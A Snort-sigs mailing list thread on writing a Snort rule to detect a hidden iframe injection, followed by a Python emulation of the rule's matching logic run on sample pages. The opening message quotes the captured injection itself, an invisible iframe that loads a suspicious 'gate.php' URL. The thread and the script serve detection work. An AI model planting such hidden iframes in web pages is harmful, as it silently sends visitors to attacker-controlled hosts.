[Snort-sigs] Rule thought

lists at ...3397...
Mon Aug 6 14:27:25 EDT 2012

On 08/06/12 13:13, James Lay wrote:
> All,
> Recently (today) I ran into the below:
> <!--qpi--><style>div.pofasdfhg{z-index:-1;position:absolute;left:0;top:0;opacity:0.0;filter:alpha(opacity=0);-moz-opacity:0;}</style><div 
> class=pofasdfhg><iframe src=http://analitics3.in/gate.php?f=1003673   
> frameborder=0 marginheight=0 marginwidth=0 scrolling=0 width=5 height=5 
> border=0></iframe></div><!--/qpi-->
> I've not seen an iframe injection that included a specified class 
> before.  My original draft rule looked like:
> alert tcp $EXTERNAL_NET $HTTP_PORTS -> $HOME_NET any 
> (msg:"INDICATOR-COMPROMISE div class iframe in page"; file_data; 
> pcre:"/<\/style><div class=[a-z]{9}><iframe src/i"; 
> classtype:web-application-attack; sid:10000017; rev:1;)
> But this looks pretty expensive.  I'm sure there's a better way to 
> match this...would it be something like:
> content:"</style><div"; pcre:"/class=[a-z]{9}>/"; content:"<iframe 
> src";
> My question is how do I tell Snort to match all three consecutively?  I 
> get that I could use within, but would that apply to the pcre?  Thanks 
> for any advice.

I think there's more of an abnormality around the unquoted URL in the iframe and
I'm not certain the class will always be 9 characters, but assuming it is how about:

div tag with class preceding iframe to specific URL"; flow:from_server,
established; file_data; content:"<div class="; content:"<iframe src=http:";
fast_pattern; within:30; pcre:"/<div class=[a-z]{9}><iframe
src=http[^\x3e]+\.php\?[a-z]=\d+\x20/"; classtype:bad-unknown; sid:x; rev:1;)

Just a thought...  Joel will probably want to add /smi ;)
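The question in the thread is how Snort ties the three matches together: the first content searches the whole file_data buffer, the second content with within:30 has to sit inside the 30-byte window that starts where the first match ended, and a pcre without /R then scans the whole buffer again. The Python below is an added illustration of that chain, not code from the list or from the Snort project. It emulates the content/within/pcre options from the reply above over constructed page fragments (the injection quoted in the thread, with the hostname swapped for the reserved placeholder example.invalid), and also shows the two caveats the reply raises: a quoted URL never matches the unquoted content pattern, and a class name longer than 9 characters pushes the iframe past the within:30 window.

```python
import re

# Snort 'pcre' from the reply, with the e-mail line wrap between "<iframe" and
# "src=" restored to the single space the rule would actually carry.
PCRE = re.compile(rb'<div class=[a-z]{9}><iframe src=http[^\x3e]+\.php\?[a-z]=\d+\x20')

CONTENT_1 = b'<div class='        # may appear anywhere in file_data
CONTENT_2 = b'<iframe src=http:'  # must sit entirely inside 30 bytes after CONTENT_1 ends
WITHIN_2 = 30                     # fast_pattern only picks the search engine pattern; no logic change


def content_match(buf, pattern, start=0, within=None):
    """Emulate a Snort content match.

    Without 'within' the pattern may appear anywhere at or after 'start'.
    With 'within' it must fit entirely inside the 'within'-byte window that
    begins where the previous content match ended (distance defaults to 0).
    Returns the offset just past the match, or None.
    """
    if within is None:
        idx = buf.find(pattern, start)
    else:
        idx = buf.find(pattern, start, start + within)
    return idx + len(pattern) if idx >= 0 else None


def rule_matches(buf):
    """Apply the chain: content -> content within:30 -> pcre (no /R, whole buffer)."""
    pos = 0
    while True:
        end1 = content_match(buf, CONTENT_1, pos)
        if end1 is None:
            return False
        end2 = content_match(buf, CONTENT_2, end1, WITHIN_2)
        if end2 is not None:
            return PCRE.search(buf) is not None
        # Like Snort's detection engine, retry with the next occurrence of the
        # first content before declaring no match.
        pos = end1


# Constructed samples (not captured traffic). INJECTED follows the fragment
# quoted in the thread with the hostname replaced by a placeholder.
INJECTED = (b'<!--qpi--><style>div.pofasdfhg{z-index:-1;position:absolute;opacity:0.0;}</style>'
            b'<div class=pofasdfhg><iframe src=http://example.invalid/gate.php?f=1003673 '
            b'frameborder=0 width=5 height=5 border=0></iframe></div><!--/qpi-->')

# Same shape, but a 20-character class name: 21 + 17 bytes exceed within:30,
# so the rule misses it (the "always 9 characters?" caveat from the reply).
LONG_CLASS = INJECTED.replace(b'pofasdfhg', b'abcdefghijklmnopqrst')

# Ordinary page: quoted iframe URL, and the div class is far from the iframe.
BENIGN = (b'<html><body><div class="sidebar">' + b'<p>text</p>' * 10 +
          b'<iframe src="https://example.invalid/widget.php?id=42" width=300>'
          b'</iframe></div></body></html>')


def classify():
    """Run the emulated rule over every sample; returns {name: matched}."""
    samples = {'injected': INJECTED, 'long_class': LONG_CLASS, 'benign': BENIGN}
    return {name: rule_matches(buf) for name, buf in samples.items()}


if __name__ == '__main__':
    for name, hit in classify().items():
        print(f'{name:11s} -> {"ALERT" if hit else "no match"}')
```

Running it reports an alert for the injected fragment only. The long_class case is the reason to widen within or loosen [a-z]{9} if the class length turns out to vary, and the benign case shows why matching on the unquoted src=http: form keeps ordinary, quoted markup out of the alert.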
